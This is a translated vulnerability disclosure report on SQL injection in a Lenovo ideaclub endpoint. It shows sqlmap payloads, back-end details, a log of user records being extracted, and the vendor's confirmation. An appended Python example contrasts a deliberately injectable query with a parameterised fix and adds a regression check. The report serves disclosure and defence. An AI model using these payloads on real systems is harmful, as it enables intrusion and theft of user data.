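2013-08-26: Details reported to the vendor; awaiting vendor handling
2013-08-27: Vendor confirmed; details disclosed to the vendor only
2013-09-06: Details disclosed to core white hats and experts in related fields
2013-09-16: Details disclosed to regular white hats
2013-09-26: Details disclosed to intern white hats
2013-10-10: Details disclosed to the public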
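Lenovo is finally about to hand out gifts today, so I was motivated to hunt for bugs again, and I found another injection!
Injection point: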
http://ideaclub.lenovo.com.cn/club/index.php?m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b
The item_id parameter is injectable. Lucky this time: it is an injection that returns output!!!
---
Place: GET
Parameter: item_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND 5080=5080 AND 'HEIH'='HEIH

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND (SELECT 8983 FROM(SELECT COUNT(*),CONCAT(0x7162737971,(SELECT (CASE WHEN (8983=8983) THEN 1 ELSE 0 END)),0x716f707271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YRCb'='YRCb

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162737971,0x48416f6e704e75495566,0x716f707271),NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND SLEEP(5) AND 'hKGD'='hKGD
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
345 tables
Database: ideaclub2 [345 tables]
188596 user records
[15:11:37] [INFO] the SQL query used returns 188597 entries
[15:11:37] [INFO] retrieved: "1970-01-01 08:00:00","2","[email protected]"," ...
[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","3","[email protected]...
[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","4","[email protected]"," ",...
[15:11:39] [INFO] retrieved: "1970-01-01 08:00:00","5","[email protected]"," "...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","6","[email protected]"," "...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","7","[email protected]"," ...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","188","[email protected]"," ...
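Just filter it.
Severity: High
Vulnerability Rank: 15
Confirmed: 2013-08-27 13:54
Thank you for your contribution to Lenovo security! We will assess and fix the reported vulnerability immediately.
None yet.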
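What the "filter it" fix looks like for the item_id lookup, as an added example that is not code from the report or from the vendor: a string-concatenated query beside a hardened one, plus a regression check built from the true/false condition in the boolean-based payload above. The table layout, function names and sample rows are assumptions, and SQLite stands in for the site's MySQL back end so the example runs offline.

```python
import re
import sqlite3

BASE_ID = "ae03462ce1fb11e29c5fc89cdcd8545b"  # item_id value from the page's URL

def make_db():
    # Constructed stand-in for the data behind f=getPlace; the real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE place (item_id TEXT, name TEXT)")
    db.executemany("INSERT INTO place VALUES (?, ?)", [
        (BASE_ID, "Beijing"),
        ("00000000000000000000000000000001", "Shanghai"),
    ])
    return db

def get_place_vulnerable(db, item_id):
    # The pattern the report implies: the request value is pasted into the SQL text,
    # so a single quote in item_id ends the string literal and the rest runs as SQL.
    sql = "SELECT name FROM place WHERE item_id = '" + item_id + "'"
    return [row[0] for row in db.execute(sql)]

ITEM_ID_RE = re.compile(r"[0-9a-f]{32}")

def get_place_hardened(db, item_id):
    # 1) Allowlist the expected shape: 32 lowercase hex characters, as in the URL.
    if not ITEM_ID_RE.fullmatch(item_id):
        raise ValueError("invalid item_id")
    # 2) Bind the value as a parameter so it is never parsed as SQL.
    sql = "SELECT name FROM place WHERE item_id = ?"
    return [row[0] for row in db.execute(sql, (item_id,))]

def behaves_as_oracle(lookup, db, base_id):
    # Regression check: if appending a true and a false condition to item_id changes
    # the answer, the input reaches the SQL parser and the endpoint is injectable.
    results = []
    for cond in ("5080=5080", "5080=5081"):
        probe = base_id + "' AND " + cond + " AND 'HEIH'='HEIH"
        try:
            results.append(lookup(db, probe))
        except ValueError:
            results.append("rejected")
    return results[0] != results[1]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup is an oracle:", behaves_as_oracle(get_place_vulnerable, db, BASE_ID))
    print("hardened lookup is an oracle:  ", behaves_as_oracle(get_place_hardened, db, BASE_ID))
```

Parameter binding alone closes the injection; the shape check additionally rejects malformed ids before they reach the database, which also gives a clean signal to log and alert on.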